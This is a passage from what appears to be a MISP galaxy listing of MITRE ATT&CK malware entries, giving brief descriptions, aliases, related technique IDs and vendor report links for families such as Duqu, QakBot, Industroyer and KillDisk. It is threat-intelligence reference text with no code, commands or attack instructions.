https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

Duqu - S0038

[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)

The tag is: misp-galaxy:mitre-malware="Duqu - S0038"

Duqu - S0038 is also known as:

  • Duqu

Duqu - S0038 has relationships with:

  • similar: misp-galaxy:tool="Duqu" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093" with estimative-language:likelihood-probability="almost-certain"

Table 7338. Table References

Links

https://attack.mitre.org/software/S0038

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Misdat - S0083

[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="Misdat - S0083"

Misdat - S0083 is also known as:

  • Misdat

Misdat - S0083 has relationships with:

  • similar: misp-galaxy:malpedia="Misdat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7339. Table References

Links

https://attack.mitre.org/software/S0083

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

Adups - S0309

[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)

The tag is: misp-galaxy:mitre-malware="Adups - S0309"

Adups - S0309 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

Table 7340. Table References

Links

http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534

https://attack.mitre.org/software/S0309

https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html

SQLRat - S0390

[SQLRat](https://attack.mitre.org/software/S0390) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://attack.mitre.org/groups/G0046) has been observed using it.(Citation: Flashpoint FIN 7 March 2019)

The tag is: misp-galaxy:mitre-malware="SQLRat - S0390"

SQLRat - S0390 is also known as:

  • SQLRat

Table 7341. Table References

Links

https://attack.mitre.org/software/S0390

https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

JHUHUGIT - S0044

[JHUHUGIT](https://attack.mitre.org/software/S0044) is malware used by [APT28](https://attack.mitre.org/groups/G0007). It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="JHUHUGIT - S0044"

JHUHUGIT - S0044 is also known as:

  • JHUHUGIT

  • Trojan.Sofacy

  • Seduploader

  • JKEYSKW

  • Sednit

  • GAMEFISH

  • SofacyCarberp

JHUHUGIT - S0044 has relationships with:

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 7342. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf

https://attack.mitre.org/software/S0044

https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/

https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

SHARPSTATS - S0450

[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)

The tag is: misp-galaxy:mitre-malware="SHARPSTATS - S0450"

SHARPSTATS - S0450 is also known as:

  • SHARPSTATS

Table 7343. Table References

Links

https://attack.mitre.org/software/S0450

https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/

ADVSTORESHELL - S0045

[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-malware="ADVSTORESHELL - S0045"

ADVSTORESHELL - S0045 is also known as:

  • ADVSTORESHELL

  • AZZY

  • EVILTOSS

  • NETUI

  • Sedreco

ADVSTORESHELL - S0045 has relationships with:

  • similar: misp-galaxy:malpedia="Sedreco" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="EVILTOSS" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022" with estimative-language:likelihood-probability="almost-certain"

Table 7344. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

https://attack.mitre.org/software/S0045

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

Asacub - S0540

[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims’ bank accounts. It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)

The tag is: misp-galaxy:mitre-malware="Asacub - S0540"

Asacub - S0540 is also known as:

  • Asacub

  • Trojan-SMS.AndroidOS.Smaps

Table 7345. Table References

Links

https://attack.mitre.org/software/S0540

https://securelist.com/the-rise-of-mobile-banker-asacub/87591/

Anchor - S0504

[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)

The tag is: misp-galaxy:mitre-malware="Anchor - S0504"

Anchor - S0504 is also known as:

  • Anchor

  • Anchor_DNS

Table 7346. Table References

Links

https://attack.mitre.org/software/S0504

https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

CloudDuke - S0054

[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)

The tag is: misp-galaxy:mitre-malware="CloudDuke - S0054"

CloudDuke - S0054 is also known as:

  • CloudDuke

  • MiniDionis

  • CloudLook

CloudDuke - S0054 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7347. Table References

Links

https://attack.mitre.org/software/S0054

https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Exodus - S0405

[Exodus](https://attack.mitre.org/software/S0405) is Android spyware deployed in two distinct stages named Exodus One (dropper) and Exodus Two (payload).(Citation: SWB Exodus March 2019)

The tag is: misp-galaxy:mitre-malware="Exodus - S0405"

Exodus - S0405 is also known as:

  • Exodus

  • Exodus One

  • Exodus Two

Table 7348. Table References

Links

https://attack.mitre.org/software/S0405

https://securitywithoutborders.org/blog/2019/03/29/exodus.html

Avaddon - S0640

[Avaddon](https://attack.mitre.org/software/S0640) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.(Citation: Awake Security Avaddon)(Citation: Arxiv Avaddon Feb 2021)

The tag is: misp-galaxy:mitre-malware="Avaddon - S0640"

Avaddon - S0640 is also known as:

  • Avaddon

Table 7349. Table References

Links

https://arxiv.org/pdf/2102.04796.pdf

https://attack.mitre.org/software/S0640

https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/

CozyCar - S0046

[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="CozyCar - S0046"

CozyCar - S0046 is also known as:

  • CozyCar

  • CozyDuke

  • CozyBear

  • Cozer

  • EuroAPT

CozyCar - S0046 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7350. Table References

Links

https://attack.mitre.org/software/S0046

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

ELMER - S0064

[ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2)

The tag is: misp-galaxy:mitre-malware="ELMER - S0064"

ELMER - S0064 is also known as:

  • ELMER

ELMER - S0064 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7351. Table References

Links

https://attack.mitre.org/software/S0064

https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

Gustuff - S0406

[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)

The tag is: misp-galaxy:mitre-malware="Gustuff - S0406"

Gustuff - S0406 is also known as:

  • Gustuff

Table 7352. Table References

Links

https://attack.mitre.org/software/S0406

https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

Industroyer - S0604

[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)

The tag is: misp-galaxy:mitre-malware="Industroyer - S0604"

Industroyer - S0604 is also known as:

  • Industroyer

  • CRASHOVERRIDE

  • Win32/Industroyer

Table 7353. Table References

Links

https://attack.mitre.org/software/S0604

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

BBK - S0470

[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="BBK - S0470"

BBK - S0470 is also known as:

  • BBK

Table 7354. Table References

Links

https://attack.mitre.org/software/S0470

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

Monokle - S0407

[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. It is developed for Android, but there are some code artifacts that suggest an iOS version may be in development.(Citation: Lookout-Monokle)

The tag is: misp-galaxy:mitre-malware="Monokle - S0407"

Monokle - S0407 is also known as:

  • Monokle

Table 7355. Table References

Links

https://attack.mitre.org/software/S0407

https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf

Sakula - S0074

[Sakula](https://attack.mitre.org/software/S0074) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)

The tag is: misp-galaxy:mitre-malware="Sakula - S0074"

Sakula - S0074 is also known as:

  • Sakula

  • Sakurel

  • VIPER

Sakula - S0074 has relationships with:

  • similar: misp-galaxy:rat="Sakula" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Sakula" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7356. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/

https://attack.mitre.org/software/S0074

Cerberus - S0480

[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to it being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim it was used in private operations for two years.(Citation: Threat Fabric Cerberus)

The tag is: misp-galaxy:mitre-malware="Cerberus - S0480"

Cerberus - S0480 is also known as:

  • Cerberus

Table 7357. Table References

Links

https://attack.mitre.org/software/S0480

https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

PinchDuke - S0048

[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="PinchDuke - S0048"

PinchDuke - S0048 is also known as:

  • PinchDuke

PinchDuke - S0048 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 7358. Table References

Links

https://attack.mitre.org/software/S0048

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

GeminiDuke - S0049

[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="GeminiDuke - S0049"

GeminiDuke - S0049 is also known as:

  • GeminiDuke

GeminiDuke - S0049 has relationships with:

  • similar: misp-galaxy:tool="GeminiDuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 7359. Table References

Links

https://attack.mitre.org/software/S0049

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Machete - S0409

[Machete](https://attack.mitre.org/software/S0409) is a cyber espionage toolset used by [Machete](https://attack.mitre.org/groups/G0095). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)

The tag is: misp-galaxy:mitre-malware="Machete - S0409"

Machete - S0409 is also known as:

  • Machete

  • Pyark

Table 7360. Table References

Links

https://attack.mitre.org/software/S0409

https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

https://securelist.com/el-machete/66108/

https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf

DoubleAgent - S0550

[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="DoubleAgent - S0550"

DoubleAgent - S0550 is also known as:

  • DoubleAgent

Table 7361. Table References

Links

https://attack.mitre.org/software/S0550

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

RARSTONE - S0055

[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)

The tag is: misp-galaxy:mitre-malware="RARSTONE - S0055"

RARSTONE - S0055 is also known as:

  • RARSTONE

RARSTONE - S0055 has relationships with:

  • similar: misp-galaxy:tool="RARSTONE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7362. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/

https://attack.mitre.org/software/S0055

TEARDROP - S0560

[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="TEARDROP - S0560"

TEARDROP - S0560 is also known as:

  • TEARDROP

Table 7363. Table References

Links

https://attack.mitre.org/software/S0560

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

EKANS - S0605

[EKANS](https://attack.mitre.org/software/S0605) is a ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc.), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)

The tag is: misp-galaxy:mitre-malware="EKANS - S0605"

EKANS - S0605 is also known as:

  • EKANS

  • SNAKEHOSE

Table 7364. Table References

Links

https://attack.mitre.org/software/S0605

https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/

https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/

https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

ViperRAT - S0506

[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT)

The tag is: misp-galaxy:mitre-malware="ViperRAT - S0506"

ViperRAT - S0506 is also known as:

  • ViperRAT

Table 7365. Table References

Links

https://attack.mitre.org/software/S0506

https://blog.lookout.com/viperrat-mobile-apt

QakBot - S0650

[QakBot](https://attack.mitre.org/software/S0650) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://attack.mitre.org/software/S0650) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://attack.mitre.org/software/S0654) and [Egregor](https://attack.mitre.org/software/S0554).(Citation: Trend Micro Qakbot December 2020)(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)

The tag is: misp-galaxy:mitre-malware="QakBot - S0650"

QakBot - S0650 is also known as:

  • QakBot

  • Pinkslipbot

  • QuackBot

  • QBot

Table 7366. Table References

Links

https://attack.mitre.org/software/S0650

https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot

https://redcanary.com/threat-detection-report/threats/qbot/

https://securelist.com/qakbot-technical-analysis/103931/

https://success.trendmicro.com/solution/000283381

BitPaymer - S0570

[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)

The tag is: misp-galaxy:mitre-malware="BitPaymer - S0570"

BitPaymer - S0570 is also known as:

  • BitPaymer

  • wp_encrypt

  • FriedEx

Table 7367. Table References

Links

https://attack.mitre.org/software/S0570

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

eSurv - S0507

[eSurv](https://attack.mitre.org/software/S0507) is mobile surveillanceware designed for the lawful intercept market that was developed over the course of many years.(Citation: Lookout eSurv)

The tag is: misp-galaxy:mitre-malware="eSurv - S0507"

eSurv - S0507 is also known as:

  • eSurv

Table 7368. Table References

Links

https://attack.mitre.org/software/S0507

https://blog.lookout.com/esurv-research

SslMM - S0058

[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="SslMM - S0058"

SslMM - S0058 is also known as:

  • SslMM

SslMM - S0058 has relationships with:

  • similar: misp-galaxy:malpedia="SslMM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7369. Table References

Links

https://attack.mitre.org/software/S0058

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

FakeSpy - S0509

[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)

The tag is: misp-galaxy:mitre-malware="FakeSpy - S0509"

FakeSpy - S0509 is also known as:

  • FakeSpy

Table 7370. Table References

Links

https://attack.mitre.org/software/S0509

https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world

WinMM - S0059

[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="WinMM - S0059"

WinMM - S0059 is also known as:

  • WinMM

WinMM - S0059 has relationships with:

  • similar: misp-galaxy:malpedia="WinMM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7371. Table References

Links

https://attack.mitre.org/software/S0059

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Clambling - S0660

[Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020)

The tag is: misp-galaxy:mitre-malware="Clambling - S0660"

Clambling - S0660 is also known as:

  • Clambling

Table 7372. Table References

Links

https://attack.mitre.org/software/S0660

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

WarzoneRAT - S0670

[WarzoneRAT](https://attack.mitre.org/software/S0670) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)

The tag is: misp-galaxy:mitre-malware="WarzoneRAT - S0670"

WarzoneRAT - S0670 is also known as:

  • WarzoneRAT

  • Warzone

  • Ave Maria

Table 7373. Table References

Links

https://attack.mitre.org/software/S0670

https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique

KillDisk - S0607

[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)

The tag is: misp-galaxy:mitre-malware="KillDisk - S0607"

KillDisk - S0607 is also known as:

  • KillDisk

  • Win32/KillDisk.NBI

  • Win32/KillDisk.NBH

  • Win32/KillDisk.NBD

  • Win32/KillDisk.NBC

  • Win32/KillDisk.NBB

Table 7374. Table References

Links

http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

https://attack.mitre.org/software/S0607

https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/

https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html

https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html

FakeM - S0076

[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="FakeM - S0076"

FakeM - S0076 is also known as:

  • FakeM

FakeM - S0076 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7375. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/software/S0076

pngdowner - S0067

[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-execute" utility. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="pngdowner - S0067"

pngdowner - S0067 is also known as:

  • pngdowner

pngdowner - S0067 has relationships with:

  • similar: misp-galaxy:malpedia="pngdowner" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"

Table 7376. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/software/S0067

Conficker - S0608

[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way onto computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)

The tag is: misp-galaxy:mitre-malware="Conficker - S0608"

Conficker - S0608 is also known as:

  • Conficker

  • Kido

  • Downadup

Table 7377. Table References

Links

https://attack.mitre.org/software/S0608

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm

LitePower - S0680

[LitePower](https://attack.mitre.org/software/S0680) is a downloader and second stage malware that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)

The tag is: misp-galaxy:mitre-malware="LitePower - S0680"

LitePower - S0680 is also known as:

  • LitePower

Table 7378. Table References

Links

https://attack.mitre.org/software/S0680

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044

ZLib - S0086

[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="ZLib - S0086"

ZLib - S0086 is also known as:

  • ZLib

ZLib - S0086 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 7379. Table References

Links

https://attack.mitre.org/software/S0086

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

httpclient - S0068

[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="httpclient - S0068"

httpclient - S0068 is also known as:

  • httpclient

httpclient - S0068 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7380. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/software/S0068

BLACKCOFFEE - S0069

[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)

